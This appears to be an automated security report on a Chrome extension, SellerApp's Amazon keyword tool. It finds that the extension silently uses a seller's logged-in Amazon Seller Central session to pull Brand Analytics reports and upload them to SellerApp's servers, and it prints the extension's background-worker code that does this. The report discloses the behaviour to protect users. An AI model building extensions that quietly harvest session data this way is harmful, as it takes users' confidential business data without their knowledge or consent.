Is Amazon Keyword Tool for free : SellerApp safe?

Medium risk

SellerApp's keyword tool silently scrapes your Amazon Seller Central Brand Analytics data and uploads it to SellerApp's servers.

Whenever you visit an Amazon or Seller Central page, the extension's background service worker wakes up and uses your logged-in seller session to pull Brand Analytics 'Query Performance' and market-basket report data across up to 20 Amazon marketplaces. It then uploads the assembled reports for every brand on your account to SellerApp's backend, with no button, popup, or notice describing this — the visible popup only offers the advertised Amazon/Flipkart keyword-suggestion tool.

sellerapp-devv3.0.4Chrome Web Store
45Risk
Who publishes it

SellerApp - 4 other listings from the same operator, 4 of them carrying a finding

What this publisher told the store about itself, and the other listings that told it the same thing.

Publisher
sellerapp-dev
Declared legal entity
SellerApp
Registered address
800 West El Camino Real, suit 180,, Mountain View, CA, 94040, Mountain View, CA 94040, US
Registered contact
SellerApp

Same store account

4 other listings published from this account, 106k+ users between them. 4 of them carry a finding.

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-200
SourceAI FOUND

Amazon Keyword Tool uploads your Seller Central Brand Analytics to SellerApp

Code analysis shows the background service worker automatically pulls your Seller Central Brand Analytics reports across 20 marketplaces and uploads the full data to SellerApp's backend, with no button or popup exposing this behavior.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You load any amazon.* or Seller Central page, or the browser restarts.

The extension did this

The service worker wakes and starts pulling your Brand Analytics reports in the background.

This runs whether or not the extension's popup is ever opened.

02EvidenceCODE COMPARE
The code that does this

The background service worker's data-collection chain

What it actually does
src/pages/background/index.js
async function scrapeAllMarketplaces() {
  const marketplaceHosts = [
    "https://sellercentral.amazon.com", "https://sellercentral.amazon.fr", "https://sellercentral.amazon.ca",
    "https://sellercentral.amazon.com.mx", "https://sellercentral.amazon.com.br", "https://sellercentral.amazon.co.uk",
    "https://sellercentral.amazon.de", "https://sellercentral.amazon.it", "https://sellercentral.amazon.es",
    "https://sellercentral.amazon.nl", "https://sellercentral.amazon.pl", "https://sellercentral.amazon.se",
    "https://sellercentral.amazon.com.tr", "https://sellercentral.amazon.ae", "https://sellercentral.amazon.sa",
    "https://sellercentral.amazon.eg", "https://sellercentral.amazon.in", "https://sellercentral.amazon.co.jp",
    "https://sellercentral.amazon.com.au", "https://sellercentral.amazon.sg"
  ];
  for (const host of marketplaceHosts) {
    try {
      const url = `${host}/api/brand-analytics/v1/dashboards`;
      const countries = (await httpClient.post(url))?.data?.dashboards
        .filter(d => d.dashboardId === "query-performance")[0].availableCountries;
      await fetchBrandsAndReports(countries, host);
    } catch (err) { console.log(err); }
  }
}

// Assembles one brand/marketplace/period record and uploads it
const buildAndUploadReport = async (brand, marketplace, reportDate, host, frequency = "monthly") => {
  const reportTable = await fetchPaginatedReport(brand.value, marketplace, host, reportDate, frequency);
  const record = {
    brand_name: brand.localizedDisplayValue,
    brand_code: brand.value,
    start_date: reportDate,
    frequency: frequency === "weekly" ? "week" : "month",
    marketplace,
    data: reportTable
  };
  uploadToSellerApp(record);
  return reportTable;
};

const uploadToSellerApp = async (record) => {
  try {
    await httpClient.post("https://api.sellerapp.com/keyword/amazon/global/market_basket_report", record);
  } catch (err) { console.log(err); }
};

// Runs immediately, unconditionally, at service-worker startup
scrapeAllMarketplaces();
03EvidenceFIELD TABLE
What gets uploaded to api.sellerapp.com per brand/marketplace/period
FieldValueWhy it matters
Brand name
Acme Home GoodsIdentifies which of your registered Amazon brands the pulled data covers.
Marketplace
https://sellercentral.amazon.co.ukWhich Amazon marketplace's Seller Central account the data was pulled from.
Reporting period
2026-06The month or week the Query Performance report covers.
Full report table
1,000+ query-performance rowsThe full search-term, impression, click, and cart-add table for that brand, period, and marketplace.
04EvidenceTHIRD PARTY LIST
Where your Brand Analytics data comes from and where it goes
  • sellercentral.amazon.<tld>

    Source of the Brand Analytics data, queried using your own logged-in Seller Central session cookie, not a separate login.

  • api.sellerapp.com

    SellerApp's own backend. Receives the assembled brand report data uploaded from your browser.

05EvidencePLAIN NOTE
Observation

Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.

Where it sends data

Destinations our analysis observed Amazon Keyword Tool for free : SellerApp contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.

  • api.sellerapp.com

    Amazon Keyword Tool for free : SellerApp sends data to api.sellerapp.com. One other extension we have analysed sends data here.

Updated 30 September 2026lebpbmopodkmcadehlkmghfcfmgnacdm